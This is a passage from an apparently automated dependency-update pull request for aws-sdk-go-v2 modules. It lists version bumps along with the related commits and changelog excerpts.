1.41.7\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.30.1...v1.41.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/config` from 1.26.6 to 1.32.17\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.26.6...config/v1.32.17\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/credentials` from 1.17.7 to 1.19.16\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.17.7...credentials/v1.19.16\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/feature/ec2/imds` from 1.15.3 to 1.18.23\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/CHANGELOG.md\"\u003egithub.com/aws/aws-sdk-go-v2/feature/ec2/imds's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease (2023-05-04)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/cloudwatch\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/cloudwatch/CHANGELOG.md#v1260-2023-05-04\"\u003ev1.26.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Adds support for filtering by metric names in CloudWatch Metric Streams.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/configservice\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/configservice/CHANGELOG.md#v1320-2023-05-04\"\u003ev1.32.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Updated ResourceType enum with new resource types onboarded by AWS Config in April 2023.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/connect\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/connect/CHANGELOG.md#v1541-2023-05-04\"\u003ev1.54.1\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Remove unused InvalidParameterException from CreateParticipant API\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/ecs\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/ecs/CHANGELOG.md#v1270-2023-05-04\"\u003ev1.27.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Documentation update for new error type NamespaceNotFoundException for CreateCluster and UpdateCluster\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/networkfirewall\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/networkfirewall/CHANGELOG.md#v1280-2023-05-04\"\u003ev1.28.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds support for the Suricata REJECT option in midstream exception configurations.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/opensearch\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/opensearch/CHANGELOG.md#v1170-2023-05-04\"\u003ev1.17.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: DescribeDomainNodes: A new API that provides configuration information for nodes part of the domain\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/quicksight\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/quicksight/CHANGELOG.md#v1350-2023-05-04\"\u003ev1.35.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for Topic, Dataset parameters and VPC\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/rekognition\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/rekognition/CHANGELOG.md#v1270-2023-05-04\"\u003ev1.27.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds a new attribute FaceOccluded. Additionally, you can now select attributes individually (e.g. [\u0026quot;DEFAULT\u0026quot;, \u0026quot;FACE_OCCLUDED\u0026quot;, \u0026quot;AGE_RANGE\u0026quot;] instead of [\u0026quot;ALL\u0026quot;]), which can reduce response time.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/s3\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/s3/CHANGELOG.md#v1331-2023-05-04\"\u003ev1.33.1\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Documentation updates for Amazon S3\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/sagemaker\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/sagemaker/CHANGELOG.md#v1770-2023-05-04\"\u003ev1.77.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: We added support for ml.inf2 and ml.trn1 family of instances on Amazon SageMaker for deploying machine learning (ML) models for Real-time and Asynchronous inference. You can use these instances to achieve high performance at a low cost for generative artificial intelligence (AI) models.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/securityhub\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/securityhub/CHANGELOG.md#v1310-2023-05-04\"\u003ev1.31.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for Finding History.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/sqs\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/sqs/CHANGELOG.md#v1210-2023-05-04\"\u003ev1.21.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release enables customers to call SQS using AWS JSON-1.0 protocol.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2023-05-03)\u003c/h1\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/appsync\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/appsync/CHANGELOG.md#v1200-2023-05-03\"\u003ev1.20.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Private API support for AWS AppSync. With Private APIs, you can now create GraphQL APIs that can only be accessed from your Amazon Virtual Private Cloud (\u0026quot;VPC\u0026quot;).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/ec2\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/ec2/CHANGELOG.md#v1960-2023-05-03\"\u003ev1.96.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Adds an SDK paginator for GetNetworkInsightsAccessScopeAnalysisFindings\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/inspector2\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/inspector2/CHANGELOG.md#v1120-2023-05-03\"\u003ev1.12.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This feature provides deep inspection for linux based instance\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/iottwinmaker\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/iottwinmaker/CHANGELOG.md#v1120-2023-05-03\"\u003ev1.12.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds a field for GetScene API to return error code and message from dependency services.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/networkfirewall\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/networkfirewall/CHANGELOG.md#v1270-2023-05-03\"\u003ev1.27.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: AWS Network Firewall now supports policy level HOME_NET variable overrides.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/opensearch\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/opensearch/CHANGELOG.md#v1160-2023-05-03\"\u003ev1.16.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Amazon OpenSearch Service adds the option to deploy a domain across multiple Availability Zones, with each AZ containing a complete copy of data and with nodes in one AZ acting as a standby. This option provides 99.99% availability and consistent performance in the event of infrastructure failure.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/wellarchitected\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/wellarchitected/CHANGELOG.md#v1200-2023-05-03\"\u003ev1.20.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release deepens integration with AWS Service Catalog AppRegistry to improve workload resource discovery.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2023-05-02)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ae835ecd4db83e5aff241520ec643afba522d704\"\u003e\u003ccode\u003eae835ec\u003c/code\u003e\u003c/a\u003e Release 2023-05-04\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef7f367760339dbf8f4bb7c81dbb86b1561b3a9e\"\u003e\u003ccode\u003eef7f367\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a62e494fe82709dd82ae4ce6d5a5a6a45287c45a\"\u003e\u003ccode\u003ea62e494\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/833592fbe1a37f1cfd8b7b7062473c7cc6a97859\"\u003e\u003ccode\u003e833592f\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/829131feddac6a2fa54ea0050ed7d8c97a29cdd7\"\u003e\u003ccode\u003e829131f\u003c/code\u003e\u003c/a\u003e Add SQSCustomizations (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2108\"\u003e#2108\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9d08e7dc2f051ac9c83deca2c548c1d4c3373cdb\"\u003e\u003ccode\u003e9d08e7d\u003c/code\u003e\u003c/a\u003e Release 2023-05-03\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/cec4d55d05fbd0bddff916f426901097073068a6\"\u003e\u003ccode\u003ecec4d55\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f558c81e77f42988da4fe0d0aee4be0294a50a8b\"\u003e\u003ccode\u003ef558c81\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8d2e554da1d221c2c1a541a78c729a3f564e8849\"\u003e\u003ccode\u003e8d2e554\u003c/code\u003e\u003c/a\u003e Release 2023-05-02\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/312e442dc8e12c6cb311e8ac5fcb5560eb4bcee1\"\u003e\u003ccode\u003e312e442\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.15.3...config/v1.18.23\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ec2` from 1.167.1 to 1.300.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/dc2d13fa6f1db25f1c6d804567e1ecfcdff4f040\"\u003e\u003ccode\u003edc2d13f\u003c/code\u003e\u003c/a\u003e Release 2026-05-04\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/da4bcffa913dc4ba46e1ce10a6268bf075547a8d\"\u003e\u003ccode\u003eda4bcff\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a8b1180254cba3e23aa6baece26783395e884d81\"\u003e\u003ccode\u003ea8b1180\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a7078055860a55b00b76d6405baaa3f4f27094a5\"\u003e\u003ccode\u003ea707805\u003c/code\u003e\u003c/a\u003e Release 2026-05-01\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/657bacf7f10746f434840a3d734e9e2895a84098\"\u003e\u003ccode\u003e657bacf\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/29b6d377e2ecb35afe2b2f81914f62f33b6e8482\"\u003e\u003ccode\u003e29b6d37\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2328c4178cc3a828ada0e914dcba16b23eb548c6\"\u003e\u003ccode\u003e2328c41\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/83b34eacc84bae944779445d005bd25eb111fc25\"\u003e\u003ccode\u003e83b34ea\u003c/code\u003e\u003c/a\u003e Release 2026-04-30\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f6eecf01d048da426be6809b82ee740e0bf21858\"\u003e\u003ccode\u003ef6eecf0\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3cca141ddf7d9e6ad796eec7c3395f0f0714bba8\"\u003e\u003ccode\u003e3cca141\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ec2/v1.167.1...service/ec2/v1.300.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ecr` from 1.27.4 to 1.57.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9bd153c05150d0c3f9d45f5b9353c34df9bab5b5\"\u003e\u003ccode\u003e9bd153c\u003c/code\u003e\u003c/a\u003e Release 2025-03-04.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b967446708e597c3c22c658d8399d11accc9e1f1\"\u003e\u003ccode\u003eb967446\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/188c52a1f53d95e7f99ce0edc73059ce5d0b803c\"\u003e\u003ccode\u003e188c52a\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/defaf5c13afed6bb77e2ee4fafea2bfcd09cea88\"\u003e\u003ccode\u003edefaf5c\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8f2dd23c2630bd2ee667a403cf8ea8611c5ce406\"\u003e\u003ccode\u003e8f2dd23\u003c/code\u003e\u003c/a\u003e add test that verifies SRA order of operations (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3025\"\u003e#3025\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3d547b010751de5a834a749ffdaddff4bcb0d39c\"\u003e\u003ccode\u003e3d547b0\u003c/code\u003e\u003c/a\u003e Release 2025-03-04\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/554a1497dc16d385e62514b10bc8adacfbd6a8d0\"\u003e\u003ccode\u003e554a149\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3abb221732b42d61c95f5306f528cc2182d37c7a\"\u003e\u003ccode\u003e3abb221\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/95ae39d57f8d986f691754737311102335039848\"\u003e\u003ccode\u003e95ae39d\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca 